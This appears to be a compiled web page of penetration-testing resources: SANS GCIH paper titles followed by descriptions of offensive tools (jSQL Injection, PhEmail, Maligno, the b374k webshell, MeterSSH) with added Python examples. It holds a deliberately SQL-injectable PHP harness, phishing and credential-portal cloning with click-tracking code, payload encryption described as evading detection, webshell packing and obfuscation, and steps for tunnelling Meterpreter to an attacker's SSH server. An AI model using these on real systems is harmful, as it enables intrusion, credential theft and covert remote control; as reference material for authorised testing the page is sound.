Wireless LAN Honeypots to Catch IEEE 802.11 Intrusions Mitchell, Gordon GCIH
Netscape Enterprise Server Denial of Service Exploit Smith, Tony GCIH
Back-Door’ed by the Slammer Hally, John GCIH
Eradicating the Masses & Round 1 with Phatbot? Fulton, Lora GCIH
FreeBSD 4.x local root vulnerability — exec() of shared signal handler Durkee, Ralph GCIH
Identifying and Handling a PHP Exploit Edelson, Eve GCIH
Exploiting Sambas SMBTrans2 Vulnerability Darrah, Byron GCIH
Relative Shell Path Vulnerability Evans, Earl GCIH
A Heap o’ Trouble: Heap-based flag insertion buffer overflow in CVS Conrad, Eric GCIH
Mutated Code Kopczynski, Tyson GCIH
Windows Shell Document Viewer shdocvw.dll Feature or Trojan Horse? Fenwick, Wynn GCIH
A J0k3r Takes Over Larrieu, Heather GCIH
Buffer overflow in BIND 8.2 via NXT records Talianek, Chris GCIH
Exploiting the MicrosoftWindows Task Scheduler ..job. Stack Overflow Vulnerability Wenchel, Kevin GCIH
Neptune.c the Birth of SYN Flood Attacks Cardinal, Steven GCIH
Apache Web Server Chunk Handling Vulnerability: An Exploit In Action Walker, Martin GCIH
My First Incident Handling Experience Kohli, Karmendra GCIH
ICQ URL Remote Exploitable Buffer Overflow de Beaupre, Adrien GCIH
Johnny and the Metasploit – “MICROSOFT LSASS MS04-011 OVERFLOW” ATTACK Greene, Richard GCIH
Lotus Notes Penetration Rademacher, Karl GCIH
System infiltration through Mercur Mail Server 4.2 Ben Alluch Ben Amar, Jamil GCIH
Session stealing with WebMin Murdoch, Don GCIH
Cisco IOS Type 7 Password Vulnerability Massey, Lee GCIH
The Cisco IPv4 Blocked Interface Exploit Johnson, Cortez GCIH
Phone Phreaking and Social Engineering Tuey, Richard GCIH
SMTP Loop Moderate Denial of Service: InterScan VirusWall NT & Lotus Domino Environment Roberts, Brian GCIH
Nachi to the Rescue? Griffith, Russ GCIH
Testing Web Applications for Malicious Input Attack Vulnerabilities Grill, Robert GCIH
Incident Illustration – Firewall Attack Reed, Bill GCIH
Incident Handling Without Guidelines McKellar, Neil GCIH
Attack of Slammer worm – A practical case study Huang, Dongmei GCIH
Combating the Nachia Worm in Enterprise Environments Johnson, Brad GCIH
Anna Kournikova Worm Ashworth, Robert GCIH
Exploiting the SSH CRC32 Compensation Attack Detector Vulnerability Williams, R. Michael GCIH
Traveling Through the OpenSSL Door Murphy, Keven GCIH
Catch the culprit! Perez, David GCIH
Illustration of VS.SST@mm Virus Incident Smith, Kevin GCIH
In Support of the Cyber Defense Initiative Kohlenberg, Toby GCIH
Incident Analysis in a Mid-Sized Company Garvin, Pete GCIH
All Your Base Are Belong To Someone Else: An Analysis Of The Windows Messenger Service Buffer Overflow Vulnerability Hewitt, Peter GCIH
Incident Illustration Black, Ronald GCIH
BackGate Kit: The Joy of “Experts” DePriest, Paul GCIH
A Management Guide to Penetration Testing Shinberg, David GCIH
Author Intruder Alert: Why Internal Security must not take a back seat. Hendrick, Jim GCIH
MS IIS CGI Filename Decode Error Vulnerability Shenk, Jerry GCIH
The t0rn Rootkit Craveiro, Paulo GCIH
At hacker’s mercy while surfing the web – A cross-zone scripting exploit for Internet Explorer Leibenzeder, Florian GCIH
A Buffer Overflow Exploit Against the DameWare Remote Control Software Strubinger, Ray GCIH
Discovering a Local SUID Exploit Pike, Jeff GCIH
Microsoft IIS Superfluous Decoding Vulnerability Orkin, Kevin GCIH
A Security Analysis of the Gnutella Peer-to-Peer Protocol Cheney, Kirk GCIH
SMTP – Always a victim of a good time Lock, James GCIH
Pass – Questions Stackhouse, Brent GCIH
A Two Stage Attack Using One-Way Shellcode Mathezer, Stephen GCIH
Once Bitten Twice Sly – Common Exploits Fueled by Common Mishap Melvin, John GCIH
KaZaA Media Desktop Virus: W32/kwbot Will, Rita GCIH
Real World ARP Spoofing Siles, Raul GCIH
BIND 8.2 NXT Remote Buffer Overflow Exploit Mcmahon, Robert GCIH
Incident Report for a Rootkit attack on a Fedora workstation Norman, Bonita GCIH
M@STER@GENTS: Masters of “SPAM” Ashland, Joanne GCIH
Support for the Cyber Defense Initiative Fresen, Lars GCIH
Penetration Testing of a Secure Network Pakala, Sangita GCIH
Local Exploit: dtprintinfo for Solaris 2.6 and 7 Sipes, Steven GCIH
PHP-Nuke: From SQL Injection to System Compromise Paynter, Eric GCIH
Employees Are Crackers Too Stapleton, Curt GCIH
Apache Web Server Chunk Handling Apache-nosejob.c Sarrazyn, Dieter GCIH
The Tactical Use of Rainbow Crack to Exploit Windows Authentication in a Hybrid Physical-Electronic Attack Mahurin, Mike GCIH
Incident Illustration – SGI Penetration Roth, Jeffrey GCIH
DreamFTP – The Nightmare Begins! Sorensen, Robert Peter GCIH
WU-FTPD Heap Corruption Vulnerability – HONORS Allen, Jennifer GCIH
Solaris in.lpd Remote Command Execution Vulnerability Seah, Meng Kuang GCIH
When Script-kiddies become the target, as well as the menace: A variant of the WU-FTPD File Globbing Heap Corruption Vulnerability Hall, Stephen GCIH
Deep Throat 3.1 Analysis Prue, Patrick GCIH
Exploiting the Microsoft Internet Explorer Malformed IFRAME Vulnerability Tu, Alan GCIH
What to do when you break WEP Wireless Security and the LAN Poer, Geoffrey GCIH
SMBdie’em All – Kill That Server Kirby, Craig GCIH
A Study of the o_wks.c Exploit for MS03-049 Arnoth, Eric GCIH
Jolt2 or “IP Fragment Re-assembly Beciragic, Jasmir GCIH

from: http://pen-testing.sans.org/resources/whitepapers

Pen Test Hackfest Summit 2014 and 2013 Documents / PDFs

SynAcktiv.com Digital Security Tools and Documents


PUBLICATIONS

2008

  • VMware and virtualization security, OSSIR, Nicolas Collignon
  • Penetration testing Windows systems, Télécom Bretagne, Renaud Feil
  • Penetration testing web applications, Télécom ParisTech, Renaud Feil

from: http://synacktiv.com/en/resources.html

WAP – Web Application Protection


WAP – Web Application Protection

WAP 2.0 is a source code static analysis and data mining tool that detects and corrects input validation vulnerabilities in web applications written in PHP (version 4.0 or higher), with a low rate of false positives.

WAP detects and corrects the following vulnerabilities:

  • SQL Injection (SQLI)
  • Cross-site scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Directory Traversal or Path Traversal (DT/PT)
  • Source Code Disclosure (SCD)
  • OS Command Injection (OSCI)
  • PHP Code Injection

This tool semantically analyses the source code. More precisely, it performs taint analysis (data-flow analysis) to detect input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs entering through entry points (the $_GET and $_POST arrays) and to verify whether they reach a sensitive sink (a PHP function that can be exploited by malicious input). After detection, the tool uses data mining to confirm whether the vulnerabilities are real or false positives. Finally, the real vulnerabilities are corrected by inserting fixes (small pieces of code) into the source code.

WAP is written in Java and consists of three modules:

  • Code Analyzer: composed of a tree generator and a taint analyser. The tool integrates a lexer and a parser generated by ANTLR, based on a grammar and a tree grammar written for the PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Syntax Tree) for each PHP file. The taint analyzer performs the taint analysis by navigating the AST to detect potential vulnerabilities.
  • False Positives Predictor: composed of a supervised training data set, with instances classified as vulnerabilities or false positives, and of the Logistic Regression machine learning algorithm. For each potential vulnerability detected by the code analyser, this module collects the presence of the attributes that define a false positive. The Logistic Regression algorithm then receives them and classifies the instance as a false positive or a real vulnerability.
  • Code Corrector: each real vulnerability is removed by correcting its source code. Based on the type of vulnerability, this module selects the fix that removes it and marks the places in the source code where the fix will be inserted. The code is then corrected by inserting the fixes, and new files are created.
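As an added illustration of the taint analysis described above (not WAP's own code, which walks an ANTLR-generated AST rather than matching text lines), the following Python script tracks data from the $_GET/$_POST entry points through assignments to a handful of sinks, records which sanitizer a value has passed through, and reports a finding only when the vulnerability class of the sink is still live for that value. The PHP sample, the sink and sanitizer tables and the one-statement-per-line matching are my own constructed simplifications.

```python
"""Toy taint analysis over PHP statements.

Added example, not part of WAP: WAP walks an ANTLR-generated AST; this script
only matches one statement per line with regular expressions. The sink and
sanitizer tables and the PHP sample below are my own constructed simplifications.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Vulnerability classes tracked, named after the list in the text.
SQLI, XSS, FI, OSCI, PHPCI = "SQLI", "XSS", "RFI/LFI", "OSCI", "PHP Code Injection"
ALL_CLASSES = frozenset({SQLI, XSS, FI, OSCI, PHPCI})

# Entry points: anything read from these superglobals is attacker-controlled.
SOURCES = ("$_GET", "$_POST", "$_COOKIE", "$_REQUEST")

# Sensitive sinks and the class of vulnerability a tainted argument produces there.
SINKS = {"mysql_query": SQLI, "echo": XSS, "print": XSS,
         "include": FI, "require": FI, "include_once": FI, "require_once": FI,
         "system": OSCI, "exec": OSCI, "shell_exec": OSCI, "eval": PHPCI}

# Sanitizers and the classes they neutralise; a cast to int neutralises all of them.
SANITIZERS = {"mysql_real_escape_string": {SQLI}, "htmlspecialchars": {XSS},
              "escapeshellarg": {OSCI}, "intval": set(ALL_CLASSES)}

# Constructed sample, not from the page; line numbers are what analyze() reports.
SAMPLE_PHP = """<?php
$id = $_GET['id'];
$name = $_POST['name'];
$safe_id = intval($_GET['id']);
$result = mysql_query("SELECT * FROM users WHERE id = " . $id);
$ok = mysql_query("SELECT * FROM users WHERE id = " . $safe_id);
echo htmlspecialchars($name);
echo $name;
$esc = htmlspecialchars($_GET['q']);
mysql_query("SELECT * FROM t WHERE q = '" . $esc . "'");
include $_GET['page'];
?>"""


def taint_of(expr: str, env: Dict[str, Set[str]]) -> Set[str]:
    """Classes for which the data produced by `expr` is still dangerous."""
    taint: Set[str] = set()
    if any(src in expr for src in SOURCES):
        taint |= ALL_CLASSES
    for var in re.findall(r"\$(\w+)", expr):
        taint |= env.get(var, set())
    # A sanitizer only counts when it wraps the whole expression.
    call = re.fullmatch(r"\s*(\w+)\s*\((.*)\)\s*", expr)
    if call and call.group(1) in SANITIZERS:
        taint -= SANITIZERS[call.group(1)]
    return taint


def sink_argument(stmt: str, sink: str) -> Optional[str]:
    """Text passed to `sink` in `stmt`, or None when the sink is not invoked."""
    m = re.search(rf"\b{sink}\b\s*(.*)$", stmt)
    if not m:
        return None
    arg = m.group(1).strip()
    if arg.startswith("(") and arg.endswith(")"):
        arg = arg[1:-1]
    return arg


def analyze(php: str) -> List[Tuple[int, str, str]]:
    """Walk statements in order; return (line, vulnerability class, sink) per tainted sink call."""
    env: Dict[str, Set[str]] = {}
    findings: List[Tuple[int, str, str]] = []
    for lineno, raw in enumerate(php.splitlines(), 1):
        stmt = raw.strip().rstrip(";")
        if not stmt or stmt.startswith(("<?php", "?>", "//", "#")):
            continue
        assign = re.fullmatch(r"\$(\w+)\s*=\s*(.+)", stmt)
        if assign:
            # Propagate taint through the assignment, then still inspect sinks on the right-hand side.
            env[assign.group(1)] = taint_of(assign.group(2), env)
        for sink, vuln in SINKS.items():
            arg = sink_argument(stmt, sink)
            if arg is not None and vuln in taint_of(arg, env):
                findings.append((lineno, vuln, sink))
    return findings


if __name__ == "__main__":
    for line, vuln, sink in analyze(SAMPLE_PHP):
        print(f"line {line}: {vuln} via {sink}()")
```

On the sample the script reports lines 5, 8, 10 and 11 and stays silent on lines 6 and 7, where intval() and htmlspecialchars() removed the relevant class. Line 10 is a real finding: the value passed through htmlspecialchars(), which neutralises XSS but not SQL injection. The script's main source of false positives is a sanitizer that is not the outermost call of an expression (e.g. `"..." . mysql_real_escape_string($x)`), which it conservatively reports; that kind of case is what WAP's False Positives Predictor is there to filter out.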

More information can be found at: http://sourceforge.net/projects/awap/files/

jSQL Injection – a Java tool for automatic SQL database injection.


jSQL Injection

jSQL Injection is a lightweight application used to find database information from a remote server. The tool is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL Injection alpha-v0.6.0


Features:

  • GET, POST, header, cookie methods
  • Normal, error based, blind, time based algorithms
  • Automatic best algorithm selection
  • Multi-thread control (start/pause/resume/stop)
  • Progression bars
  • Shows URL calls
  • Simple evasion
  • Proxy setting
  • Distant file reading
  • Webshell deposit
  • Terminal for webshell commands
  • Configuration backup
  • Update checker
  • Admin page checker
  • Brute forcer (md5 mysql…)
  • Coder (encode decode base64 hex md5…)
  • Supports MySQL

Injection and local test

Running an injection requires the URL of a local or remote server and the name of the parameter to inject.
For a local test, you can save the following PHP code into a file ‘simulate_get.php’ and move it to the root folder of your web server (e.g. /www), then use http://127.0.0.1/simulate_get.php?lib= and finally click Connect to read the local database:

<?php
    # Deliberately vulnerable test harness for a local database: $_GET['lib'] is
    # concatenated into the query unsanitised. The mysql_* functions were removed
    # in PHP 7, so this needs a PHP 5 interpreter.
    mysql_connect("localhost", "root", "");
    mysql_select_db("my_own_database");

    $result = mysql_query("SELECT * FROM my_own_table WHERE my_own_field = " . $_GET['lib'])  # time based
        or die(mysql_error());  # error based: the database error text is returned to the client

    if (mysql_num_rows($result) !== 0) echo " something ";  # blind: the response changes with the query result

    while ($row = mysql_fetch_array($result, MYSQL_NUM))
        echo join(',', $row);  # normal: rows are printed in the response
?>


More information can be found at: https://github.com/ron190/jsql-injection

sn00p – a modular tool written in Bourne shell and designed to chain and automate security tools and tests.


sn00p

sn00p is a modular tool written in Bourne shell and designed to chain and automate security tools and tests. It parses target definitions from the command line and then runs the corresponding modules. The tool can also parse a given nmap logfile for open TCP and UDP ports. All results are logged in the specified directories, and a report can subsequently be generated.

It is easy to adjust the tool to your needs by simply adding your own modules and audits.

sn00p is NOT intended to be a security framework or scanner! It is up to the user to define their own modules and audits. The predefined modules are written as examples using well-known tools and test scenarios.

sn00p has 6 module directories:

  •  host
  •  tcp
  •  udp
  •  web
  •  lan
  •  wlan

These directories contain predefined modules with well-known security tools and tests.

Audits are defined in modules. They are subroutines which run basically any security tools and tests and log the results in logfiles.

More information can be found at: http://nullsecurity.net/tools/automation.html

PhEmail – a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test


PhEmail

PhEmail is a Python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a batch of phishing emails and prove who clicked on them, without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to gather email addresses through LinkedIn, useful during the information gathering phase. This tool also supports Gmail authentication, which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.


In recent years networks have become more secure through server hardening and deployment of security devices such as firewalls and intrusion prevention systems. This has made it harder for hackers and cyber criminals to launch successful direct attacks from outside of the network perimeter. As a result, hackers and cyber criminals are increasingly resorting to indirect attacks through social engineering and phishing emails.

What are social engineering and phishing attacks?

Social engineering is the art of tricking people into performing actions or revealing information with the aim of gaining access to information systems or confidential information. There are several social engineering attacks and techniques such as phishing emails, pretexting and tailgating.

Phishing is one of the easiest and most widely used social engineering attacks, where the attackers send spoofed emails that appear to be from a trusted individual or company such as a colleague or a supplier. The emails will often look identical to legitimate emails and will include company logos and email signatures. Once attackers successfully trick the victim into clicking on a malicious link or opening a booby-trapped document, they can bypass the company’s external defence mechanisms and gain a foothold in the internal network. This could allow them to gain access to sensitive and confidential information which might have financial or reputational consequences.

Installation

You can download the latest version of PhEmail by cloning the GitHub repository:

git clone https://github.com/Dionach/PhEmail

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <reply_address>] [-s <subject>] [-b <body>]
          -e    emails: File containing list of emails (Default: emails.txt)
          -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
          -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
          -s    subject: Subject of the email (Default: Newsletter)
          -b    body: Body of the email (Default: body.txt)
          -p    pages: Specifies number of results pages searched (Default: 10 pages)
          -v    verbose: Verbose Mode (Default: false)
          -l    layout: Send email with no embedded pictures 
          -B    BeEF: Add the hook for BeEF
          -m    mail_server: SMTP mail server to connect to
          -g    Google: Use a google account username:password
          -t    Time delay: Add delay between each email (Default: 3 sec)
          -R    Bunch of emails per time (Default: 10 emails)
          -L    webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
          -S    Search: query on Google
          -d    domain: of email addresses
          -n    number: of emails per connection (Default: 10 emails)
          -c    clone: Clone a web page
          -w    website: where the phishing email link points to
          -o    save output in a file
          -F    Format (Default: 0): 
                0- firstname surname
                1- firstname.surname@example.com
                2- firstnamesurname@example.com
                3- f.surname@example.com
                4- firstname.s@example.com
                5- surname.firstname@example.com
                6- s.firstname@example.com
                7- surname.f@example.com
                8- surnamefirstname@example.com
                9- firstname_surname@example.com 

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com
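
The two mechanics behind the usage above that are worth seeing in code are the address-format guesses behind the -F option and the "prove who clicked" step: each recipient gets a link with a per-recipient token, and the web server log (-L) is later matched back to recipients. What follows is an added example, not PhEmail's code; the HMAC-based token, the secret, the log format (Apache/nginx combined) and the log lines are all constructed for the example.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlencode, urlparse


def address_formats(first, last, domain):
    """The ten candidate layouts of PhEmail's -F option, indexed 0-9."""
    f, s = first.lower(), last.lower()
    return [
        f"{f} {s}",                  # 0 firstname surname
        f"{f}.{s}@{domain}",         # 1
        f"{f}{s}@{domain}",          # 2
        f"{f[0]}.{s}@{domain}",      # 3
        f"{f}.{s[0]}@{domain}",      # 4
        f"{s}.{f}@{domain}",         # 5
        f"{s[0]}.{f}@{domain}",      # 6
        f"{s}.{f[0]}@{domain}",      # 7
        f"{s}{f}@{domain}",          # 8
        f"{f}_{s}@{domain}",         # 9
    ]


def format_address(first, last, domain, fmt=1):
    return address_formats(first, last, domain)[fmt]


# Per-engagement secret (constructed). Tokens are an HMAC of the recipient
# address, so a token seen in the log proves it was one we issued; a recipient
# who edits the URL cannot forge a token that attributes a click to a colleague.
SECRET = b"rotate-this-per-engagement"


def tracking_token(secret, email):
    return hmac.new(secret, email.lower().encode(), hashlib.sha256).hexdigest()[:16]


def tracking_link(base_url, secret, email):
    return base_url + "?" + urlencode({"id": tracking_token(secret, email)})


# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)


def attribute_clicks(log_lines, secret, recipients):
    """Return {email: [{"ip", "time", "user_agent"}, ...]} for every request
    carrying a token we issued. Unknown tokens and unrelated requests are
    dropped rather than guessed at."""
    token_to_email = {tracking_token(secret, e): e for e in recipients}
    hits = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, path, _status, user_agent = m.groups()
        token = parse_qs(urlparse(path).query).get("id", [None])[0]
        email = token_to_email.get(token)
        if email is None:
            continue
        hits.setdefault(email, []).append({"ip": ip, "time": when, "user_agent": user_agent})
    return hits


RECIPIENTS = [
    format_address("Alice", "Smith", "example.com"),
    format_address("Bob", "Jones", "example.com"),
]


def sample_log():
    """Constructed web-server log lines: two clicks by Alice, an unrelated
    favicon request, and a probe carrying a token we never issued."""
    ua = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0)"
    alice = tracking_token(SECRET, RECIPIENTS[0])
    return [
        f'203.0.113.5 - - [10/Mar/2015:09:14:22 +0000] "GET /newsletter?id={alice} HTTP/1.1" 200 512 "-" "{ua}"',
        f'203.0.113.5 - - [10/Mar/2015:09:14:23 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "{ua}"',
        '198.51.100.9 - - [10/Mar/2015:09:20:01 +0000] "GET /newsletter?id=0123456789abcdef HTTP/1.1" 200 512 "-" "curl/7.38.0"',
        f'203.0.113.5 - - [10/Mar/2015:11:02:40 +0000] "GET /newsletter?id={alice} HTTP/1.1" 200 512 "-" "{ua}"',
    ]


if __name__ == "__main__":
    for email in RECIPIENTS:
        print(email, tracking_link("http://phish.example.net/newsletter", SECRET, email))
    for email, clicks in attribute_clicks(sample_log(), SECRET, RECIPIENTS).items():
        print(email, len(clicks), "click(s), first from", clicks[0]["ip"])
```

The user agent and source IP per click are what "collecting as much information as possible" amounts to without exploiting anything; the curl probe with a made-up token is silently ignored, which is the behaviour you want when a recipient, or their mail gateway's link scanner, starts poking at the URL.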

Usage of PhEmail for attacking targets without prior mutual consent is illegal.

What can you do to protect yourself?

These attacks rely on and exploit weaknesses in human nature. Companies can take several steps to protect themselves and reduce the likelihood of such attacks being successful. The first step is to build a good security training and awareness program in which staff members are taught the dangers of phishing emails and how to identify such emails. The second step is to conduct regular client-side and social engineering tests which include sending targeted phishing emails. This would help the company evaluate the effectiveness of the security training and awareness program and how to improve it to try and eliminate the risk of such attacks.

More information can be found at: https://github.com/Dionach/PhEmail

Maligno – an open source penetration testing tool written in Python that serves Metasploit payloads.


Maligno

Maligno is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy's PyInjector. This modified client implements HTTP, HTTPS and encryption capabilities. The client connects to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client decodes it, decrypts it and injects it into the target machine. As a result, you should get your Metasploit session while the payload itself never appears in the clear on the wire.
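
To make the transport concrete, here is an added example, not Maligno's own code, of the wrap the server applies (AES in CBC mode with a random IV, PKCS#7 padding, then Base64) and the unwrap the client performs before handing the bytes to its injection routine. It uses the `cryptography` package; the key, the IV-prefix layout and the placeholder "shellcode" are this example's assumptions, and nothing here injects anything.

```python
import base64
import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

BLOCK = 16  # AES block size in bytes


def wrap_payload(shellcode: bytes, key: bytes) -> str:
    """Server side: AES-CBC under a fresh random IV, PKCS#7 padded, then
    Base64 so the HTTP body is plain printable text on the wire."""
    iv = os.urandom(BLOCK)
    padder = padding.PKCS7(BLOCK * 8).padder()
    padded = padder.update(shellcode) + padder.finalize()
    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()
    return base64.b64encode(iv + ciphertext).decode("ascii")


def unwrap_payload(blob: str, key: bytes) -> bytes:
    """Client side: Base64-decode, split off the IV, decrypt, strip padding.
    The result is what the client would pass to its injection routine."""
    raw = base64.b64decode(blob)
    iv, ciphertext = raw[:BLOCK], raw[BLOCK:]
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(BLOCK * 8).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


# Constructed stand-ins: a 32-byte key of the kind that would be embedded in
# the client, and a placeholder for msfvenom output (NOP sled plus int3).
DEMO_KEY = bytes(range(32))
DEMO_SHELLCODE = b"\x90" * 8 + b"\xcc"

if __name__ == "__main__":
    blob = wrap_payload(DEMO_SHELLCODE, DEMO_KEY)
    print("on the wire:", blob)
    print("recovered  :", unwrap_payload(blob, DEMO_KEY).hex())
```

Two things follow from this layout. A signature-based device only ever sees a short Base64 string that changes on every request because of the fresh IV, so there is nothing stable to match. Conversely, the key has to live inside the client, so anyone who obtains the client binary can decrypt captured traffic, and CBC without an authentication tag means a modified blob is decrypted and injected rather than rejected.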

More information can be found at: http://www.encripto.no/tools/

b374k – PHP Webshell with handy features


b374k – PHP Webshell with handy features

This PHP shell is a tool for system or web administrators to do remote management without using cPanel, SSH, FTP, etc. All actions take place within a web browser.

Features:

  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5

Requirements:

  • PHP version > 4.3.3 and PHP 5
  • As it uses zepto.js v1.1.2, you need a modern browser to use the b374k shell. See browser support on the zepto.js website http://zeptojs.com/
  • Responsibility for what you do with this shell

Installation:

Download b374k.php (default password: b374k), change the password and upload b374k.php to your server. The stored password is in sha1(md5()) format, i.e. sha1 of the hex md5 of the password. Alternatively, build your own b374k.php with the packer, as explained below.

Customize:

After you have finished editing the files, upload index.php and the base, module and theme directories with all their contents to a server.

Using Web Browser :

Open index.php in your browser. Quick run only runs the shell without packing it. Use the packer to pack all files into a single PHP file: set the available options and the output file will be written to the same directory as index.php.

Using Console :

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes

example :

$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
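
Two of the steps above are easy to get wrong by hand: computing the sha1(md5()) password hash when setting your own password, and recognising what -b and -z produced when you later need to read a packed file (for instance one recovered from a compromised server). The block below is an added example, not b374k's packer: it computes the hash the way PHP does, mirrors the -b/-z/-c transformations by assuming the -z names map to the PHP functions of the same name, and reverses them with header-based autodetection. The PHP source it packs is constructed.

```python
import base64
import gzip
import hashlib
import zlib

COMPRESSIONS = ("no", "gzdeflate", "gzencode", "gzcompress")


def b374k_password_hash(password: str) -> str:
    """sha1(md5(password)) as PHP computes it: md5() yields a hex string and
    sha1() is taken over that hex string, not over the raw 16-byte digest."""
    md5_hex = hashlib.md5(password.encode()).hexdigest()
    return hashlib.sha1(md5_hex.encode()).hexdigest()


def pack(source: str, compression: str = "no", level: int = 9) -> str:
    """Mirror the packer's -b/-z/-c options: compress with the PHP function
    the option names (assumption), then Base64-encode."""
    data = source.encode()
    if compression == "gzdeflate":       # raw DEFLATE stream, no container
        c = zlib.compressobj(level, zlib.DEFLATED, -15)
        data = c.compress(data) + c.flush()
    elif compression == "gzencode":      # gzip container
        data = gzip.compress(data, compresslevel=level)
    elif compression == "gzcompress":    # zlib container
        data = zlib.compress(data, level)
    elif compression != "no":
        raise ValueError(f"unknown compression {compression!r}")
    return base64.b64encode(data).decode("ascii")


def detect_compression(blob: str) -> str:
    """Analyst side: work out which of the four encodings a Base64 blob from a
    packed file uses, from the container headers."""
    data = base64.b64decode(blob)
    if data[:2] == b"\x1f\x8b":                                   # gzip magic
        return "gzencode"
    if len(data) >= 2 and data[0] & 0x0F == 8 and (data[0] << 8 | data[1]) % 31 == 0:
        return "gzcompress"                                       # zlib header
    if data.lstrip().startswith(b"<?"):
        return "no"                                               # plain PHP
    try:
        zlib.decompress(data, -15)
        return "gzdeflate"
    except zlib.error:
        return "no"


def unpack(blob: str, compression: str = None) -> str:
    """Invert pack(); autodetects the compression when not given."""
    compression = compression or detect_compression(blob)
    data = base64.b64decode(blob)
    if compression == "gzdeflate":
        data = zlib.decompress(data, -15)
    elif compression == "gzencode":
        data = gzip.decompress(data)
    elif compression == "gzcompress":
        data = zlib.decompress(data)
    return data.decode()


# Constructed stand-in for the shell's PHP source.
SAMPLE_SOURCE = "<?php echo 'hello from the packed file'; ?>"

if __name__ == "__main__":
    print("password hash for 'b374k':", b374k_password_hash("b374k"))
    for comp in COMPRESSIONS:
        blob = pack(SAMPLE_SOURCE, comp)
        print(f"{comp:10s} {len(blob):4d} chars  detected={detect_compression(blob)}")
```

The loader stub that a packed b374k.php wraps around its blob is not reproduced here; to inspect a packed file, pull out the Base64 string and pass it to unpack(). Note that -s, -b and -z change only size and readability, not how the shell behaves, so none of them is a substitute for the password.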

Don't forget to delete index.php, base, module, theme and all files inside them after you have finished. They are not protected with a password, so leaving them on the server is a security threat.

More information can be found at: https://github.com/b374k/b374k

MeterSSH – Meterpreter over SSH


MeterSSH – Meterpreter over SSH

As penetration testers, it is crucial to identify what types of attacks are detected and which are not. After a recent penetration test against a next generation firewall, much of the analysis had shifted away from the endpoints and towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based "next generation" product lines.


MeterSSH is a way to take shellcode, inject it into memory, then tunnel whatever port you want over SSH so that the communications look like a normal SSH connection. It works by injecting shellcode into memory, then wrapping the port spawned by the shellcode (Meterpreter's bind port in this case) in an SSH tunnel back to the attacker's machine. Connecting Meterpreter's handler to localhost on the attacker's machine then reaches the victim through the SSH tunnel. All communications are relayed inside the SSH tunnel rather than as a separate connection that is visible on the network.

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker's machine through an SSH tunnel, all self-contained in one single Python file. The Python script can easily be converted to an executable using pyinstaller or py2exe.

Features

  1. Meterpreter over SSH
  2. Ability to configure different IPs, addresses, etc. without ever needing to change the shellcode.
  3. Monitor for the SSH connection and automatically spawn the shell

Usage

MeterSSH is easy: simply edit the meterssh.py file, add your SSH server IP, port, username and password, and run the script. It will spawn Meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (a Python SSH module) is used to tunnel port 8021 back to the attacker, so all Meterpreter communications are tucked within the SSH tunnel.

There are two files, monitor.py and meterssh.py.

  • monitor.py – run this on the attacker's machine to listen for the SSH connection; it polls localhost port 8021 for the SSH tunnel and then spawns Metasploit automatically to grab the shell.
  • meterssh.py – this is what you deploy to the victim machine; note that most Windows machines won't have Python installed, so it is recommended to compile the script into an executable with py2exe or pyinstaller.


Fields you need to edit inside meterssh.py

# username for the attacker's SSH server
user = "sshuser"
# password for SSH
password = "sshpw"
